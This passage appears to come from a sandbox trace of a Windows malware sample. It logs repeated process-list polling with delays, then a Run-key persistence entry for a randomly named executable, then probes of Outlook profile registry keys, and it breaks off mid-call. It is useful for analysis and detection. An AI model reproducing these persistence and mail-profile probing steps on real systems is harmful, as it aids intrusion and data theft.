Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.129] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.145] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.160] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.206] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.222] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.239] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.253] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.270] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.284] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.302] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.316] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.332] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.347] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.362] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0166.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0166.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0166.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0166.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0166.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0166.379] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0166.411] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x14e620 | out: TokenHandle=0x14e620*=0x80) returned 0x0 [0166.411] NtQueryInformationToken (in: TokenHandle=0x80, TokenInformationClass=0x14, TokenInformation=0x14e618, TokenInformationLength=0x4, ReturnLength=0x14e61c | out: TokenInformation=0x14e618, ReturnLength=0x14e61c) returned 0x0 [0166.411] NtClose (Handle=0x80) returned 0x0 [0166.427] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e5f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.445] NtCreateFile (in: FileHandle=0x14e610, DesiredAccess=0x12019f, ObjectAttributes=0x14e5d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e5f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e610*=0x0, IoStatusBlock=0x14e5f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0166.447] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x76da30) returned 1 [0166.447] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e5e0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.447] NtCreateFile (in: FileHandle=0x14e600, DesiredAccess=0x120089, ObjectAttributes=0x14e5c8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e5e8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e600*=0x0, IoStatusBlock=0x14e5e8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0166.447] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x76da30) returned 1 [0166.448] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x14e1f0 | out: TokenHandle=0x14e1f0*=0x80) returned 0x0 [0166.448] NtQueryInformationToken (in: TokenHandle=0x80, TokenInformationClass=0x1, TokenInformation=0x14d9e8, TokenInformationLength=0x400, ReturnLength=0x14e1e8 | out: TokenInformation=0x14d9e8, ReturnLength=0x14e1e8) returned 0x0 [0166.448] ConvertSidToStringSidW (in: Sid=0x14d9f0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x14e1ec | out: StringSid=0x14e1ec*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0166.449] NtClose (Handle=0x80) returned 0x0 [0166.686] NtCreateKey (in: KeyHandle=0x14e628, DesiredAccess=0x2021f, ObjectAttributes=0x14e1ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e628*=0x0) returned 0xc0000022 [0166.687] NtCreateKey (in: KeyHandle=0x14e628, DesiredAccess=0x2021f, ObjectAttributes=0x14e1ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e628*=0x80) returned 0x0 [0169.172] NtSetValueKey (in: KeyHandle=0x80, ValueName="LRQPL", TitleIndex=0x0, Type=0x1, Data="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", DataSize=0x5c | out: Data="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe") returned 0x0 [0169.174] NtClose (Handle=0x80) returned 0x0 [0169.174] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e5f4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.174] NtCreateFile (in: FileHandle=0x14e614, DesiredAccess=0x12019f, ObjectAttributes=0x14e5dc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e5fc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e614*=0x0, IoStatusBlock=0x14e5fc*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.175] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x76da30) returned 1 [0169.175] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e5e4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.175] NtCreateFile (in: FileHandle=0x14e604, DesiredAccess=0x120089, ObjectAttributes=0x14e5cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e5ec, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e604*=0x0, IoStatusBlock=0x14e5ec*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.175] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x76da30) returned 1 [0169.196] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x14dfac | out: TokenHandle=0x14dfac*=0x80) returned 0x0 [0169.196] NtQueryInformationToken (in: TokenHandle=0x80, TokenInformationClass=0x1, TokenInformation=0x14d7a4, TokenInformationLength=0x400, ReturnLength=0x14dfa4 | out: TokenInformation=0x14d7a4, ReturnLength=0x14dfa4) returned 0x0 [0169.197] ConvertSidToStringSidW (in: Sid=0x14d7ac*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x14dfa8 | out: StringSid=0x14dfa8*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0169.197] NtClose (Handle=0x80) returned 0x0 [0169.197] NtCreateKey (in: KeyHandle=0x14e620, DesiredAccess=0x20219, ObjectAttributes=0x14dfa8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e620*=0x0) returned 0xc0000034 [0169.197] NtCreateKey (in: KeyHandle=0x14e620, DesiredAccess=0x20219, ObjectAttributes=0x14dfa0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e620*=0x0) returned 0xc0000034 [0169.197] NtCreateKey (in: KeyHandle=0x14e620, DesiredAccess=0x20219, ObjectAttributes=0x14dfbc*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, 